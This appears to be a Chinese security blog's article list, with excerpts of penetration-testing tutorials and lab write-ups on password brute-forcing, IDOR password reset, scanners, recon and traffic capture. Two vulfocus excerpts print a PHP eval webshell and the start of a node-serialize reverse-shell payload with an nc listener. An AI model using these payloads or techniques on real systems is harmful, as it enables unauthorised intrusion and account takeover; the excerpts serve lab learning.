beirry
这个作者很懒,什么都没留下…
展开
-
渗透实战-批量任意密码重置
对修改密码操作进行抓包测试:那么这里有几个值,第一个是user_id,参数是数字;本来以为这里的校验机制会根据用户名和名称校验,当时进行了更改测试,讲用户名和名称更改成管理员相关信息,后来经过发现只需要修改user_id,就可以修改所有的账号密码,开发人员并没有对用户名和名称进行校验。那么我们这里仅需更改user_id就可以修改任意用户的账号密码,通过爆破的方式就可以批量地更改密码,这个是比较严重的。登录到平台后,点击更改密码,发现不需要旧密码即可修改密码,此处可能就存在越权漏洞。原创 2024-07-24 11:21:07 · 176 阅读 · 0 评论 -
Python安全工具编写-密码爆破
密码爆破其实是将把可能为密码的字符串集合逐一验证,通过验证返回的结果来找到密码。为了验证编写密码爆破工具的有效性,则用了DVWA靶场来验证。我们随意输入一串数字来看看返回的验证结果是如何。可以看到,只要密码不正确则页面会显示Username and/or password incorrect.那么根据这一特征,我们则可以利用密码爆破来编写爆破的框架了,首先我们确定我们爆破密码的必需品:1,模仿页面产生请求;2,密码尝试;3,获取返回页面特征import requestsdef function_原创 2022-02-23 11:24:58 · 5420 阅读 · 1 评论 -
渗透常用工具-AWVS使用
AWVS安装AWVS我是装在Docker上的,在VPS中部署好Docker后,敲入以下命令docker pull secfa/docker-awvs #拉取镜像docker run -it -d -p 8443:3443 secfa/docker-awvs #将Docker的3443端口映射到VPS的8443端口访问https://VPS的IP:8443默认账号密码:username: admin@admin.compassword: Admin123登录进来是这样一个页面扫描站点在原创 2022-03-01 12:36:57 · 6971 阅读 · 0 评论 -
渗透常用工具-SQLMap
sqlmap 是用python编写的渗透测试工具,可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。通常检测到存在sql注入点时,就可以利用此工具来进行验证。下载使用SQLMap下载地址:https://sqlmap.org/#downloadPython下载地址:https://www.python.org/downloads/根据以上下载地址来获取安装包SQLmap:Python:下载完后安装即可使用。使用方法打开sqlmap所在目录,打开命令行。在命令行中输入pyt原创 2022-05-08 23:05:50 · 1280 阅读 · 0 评论 -
渗透常用工具-Goby
许久没更新这个栏目了,今天就来介绍一下经常用到的工具:Goby初学安全的朋友可能对这个工具不太熟悉,这个主要是用作于扫描资产是否存在漏洞的工具,里面内置了丰富的POC(漏洞验证)包,在检测后并会出一份详细的报告给到使用者。根据自己的操作系统下载对应的版本,我这里是windows版本,所以下载的是第一个。下载后得到一个压缩包,解压后可以看到以下文件,打开Goby.exe文件在左下角可以设置语言为中文。点击Scan可以建立扫描任务。建立扫描任务后可以看到扫描的信息资产信息:漏洞信息:扫描原创 2022-06-29 15:57:49 · 9545 阅读 · 2 评论 -
Python安全工具编写-命令行参数
当我们使用像nmap,sqlmap这类工具时,都是通过命令行的方式去运行的。那么怎么将我们要填入的参数写入到工具里呢?这里介绍几个模块:sys,optparse,argparse先来介绍sys。原创 2022-08-15 19:27:25 · 367 阅读 · 2 评论 -
Python安全工具编写-Socket实现远程连接
这个章节需要先对网络具有一定的了解,主要会讲到TCP和UDP,此篇文章不会太多过于介绍网络基础。原创 2022-12-03 00:51:24 · 1602 阅读 · 0 评论 -
红队攻防知识分享-被动信息收集
信息收集的基本要求1.全面:做到对目标所有的业务面和非业务面的存在点进行全面的信息收集。2.准确:对于收集到的信息尤其是重要信息要再三确认其信息的准确性,对信息的内容中所涉及的技术点要手动查看。3.时效:对于收集到的信息要注意信息产生的时间和收集到的时间,是否具有时间差,时间差能否接受,如果存在失效的信息要及时清除。4.清晰:对于收集到的信息要做到逻辑清晰,能清楚地分辨出各个收集到的信息之间的逻辑关系和资产之间的相对位置,对于总体目标要有清晰的资产逻辑和业务逻辑认识。...原创 2021-12-06 16:23:09 · 3665 阅读 · 0 评论 -
红队攻防基础知识分享
此文章内容均来自Ms08067红队攻防培训中所学。基本的红队测试流程介绍1.接到项目合同并制定相应计划2.准备相应的工具和材料3.做第一次信息收集4.做漏洞扫描或攻击面测试5.针对突出的攻击面做具体的渗透6.进入环境之后的第二次信息收集7.提升权限8.维持权限9.寻找扩大攻击面的渠道10.清理攻击痕迹11.编写报告攻击机通过对web服务进行第一次信息收集,而后通过该站点存在的漏洞获取到该服务器的权限并进入到内网环境;再做第二次的信息收集,第二次的信息收集,是为了提升我们的权限;再提原创 2021-12-02 16:14:22 · 1026 阅读 · 0 评论 -
Python安全工具编写-搜索引擎收集信息
以下是基于传统引擎信息收集为例在写安全工具时,首先要确定好我们的功能点:1,请输入查询指令(要查询什么)2,与搜索引擎建立连接3,返回结果4,筛选出我们想要的元素那么我们将以上结果在必应上先操作一遍我们发现搜索引擎基本上传值方式都是GET传值,且将查询指令作为q的值传输给搜索引擎在进行翻页操作时,first值会发生变化,如第一页first为1,第二页为11,第三页为21。。。那么规律就出来了,每翻一页,则first会加10,且每一页显示的结果都为10条根据以上结果我们就可以确定基本的代码原创 2021-12-06 10:44:56 · 1659 阅读 · 0 评论 -
Python安全工具编写-pcap流量包重放
最近因为log4j漏洞,工作量急剧增加,卑微小乙没日没夜地进行应急处理,为了能测试是否能检测到log4j攻击,我专门写了一个脚本,当然这个脚本也不只是检测log4j,只要是pcap包放在指定目录下则可以重放。我写脚本的时候总喜欢先确认功能点,毕竟这是我们写代码的前提了。功能点:将指定目录中所有pcap文件全部找出重放1,找到指定目录(pcaps)中所有pcap文件def find_pcap(dir,filelist): for i in os.listdir(dir):#将目录下所有内容拉出来判断原创 2021-12-15 17:50:44 · 5746 阅读 · 2 评论 -
Python安全工具编写-网络空间搜索引擎收集信息
其实在fofa搜索页面已经给了脚本的编写规则和方法,都在API中我们Python安全工具编写脚本主要是通过调用FOFA的API来收集信息,这个是帮助文档:https://fofa.so/static_pages/api_help通过帮助文档我们可以确定这个脚本需要哪些东西1,输入查询内容2,将查询内容经过base64编码3,将返回内容输出成json格式4,筛选想要的内容5,输出内容那么这上面就是我们编写脚本的一个基本框架import requestsimport base64impo原创 2021-12-06 12:07:52 · 1452 阅读 · 2 评论 -
渗透实战-Burp无法抓取https包
Burp无法抓取https包原创 2023-02-21 10:41:00 · 4140 阅读 · 1 评论 -
渗透实战-抓取APP流量包
现在渗透测试不仅要对传统的web测试,还要对APP,微信小程序,微信公众号进行测试。接下来我将对微信小程序来进行抓包发送给burpsuit。这里选择本地模式,管理员启动点击连接引擎配置系统代理配置以下内容,点击配置HTTP/HTTPS代理启用成功打开左边的手工渗透测试,点击MITM,点击劫持启动,即可运行可以看到右上角有手动劫持,自动放行,被动日志三个选项,现在处于自动放行状态,则不抓包输入手机号,获取验证码可以看到抓取到数据包原创 2022-12-04 23:06:46 · 3724 阅读 · 0 评论 -
渗透实战-抓取微信小程序流量包
现在渗透测试不仅要对传统的web测试,还要对APP,微信小程序,微信公众号进行测试。接下来我将对微信小程序来进行抓包发送给burpsuit。Proxifier是一款功能非常强大的代理客户端。我们将用此软件来抓取微信小程序的流量包。勾选Enable HTTP proxy servers support选择proxy Servers添加监听地址点击此按钮,设置规则添加规则以下是添加规则以小程序肯德基(疯狂星期四YYDS)为例,先打开小程序,再打开任务管理器,找到小程序肯德基+的进程,右键打原创 2022-12-04 22:39:24 · 2635 阅读 · 0 评论 -
CVE-2020-25790(typesetter 文件上传)
vulfocus-typesetter 文件上传(CVE-2020-25790)从web端进入CMS,点击已上传的档案页面准备test.php文件,文件内容如下<?php @eval($_POST['cmd']);?>//一句话木马,$_POST的值是webshell密码将test.php上传到该页面,出现报错,报错内容是permission denied.将test.php压缩成zip文件,再次上传上传成功,解压test.zip文件test.php文件解压成功获取t原创 2021-11-24 17:27:36 · 1346 阅读 · 0 评论 -
CVE-2017-5941 (nodejs 代码执行)
vulfocus-nodejs 代码执行 (CVE-2017-5941)复现环境攻击机(192.168.95.58)靶场环境(10.3.61.69)复现过程在含有nc文件目录下打开两个cmd,监听8888端口nc -lvp [端口]访问环境:http://10.3.61.69:55269账号随意输入,密码构造payload如下_$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >&原创 2021-11-24 17:07:25 · 1359 阅读 · 0 评论 -
渗透实战-通过fofa+rad+xray批量挖掘src
这篇文章主要是实现通过fofa来收集资产信息,将信息传递给rad,xray来进行挖掘src。原创 2022-10-23 23:35:14 · 2080 阅读 · 7 评论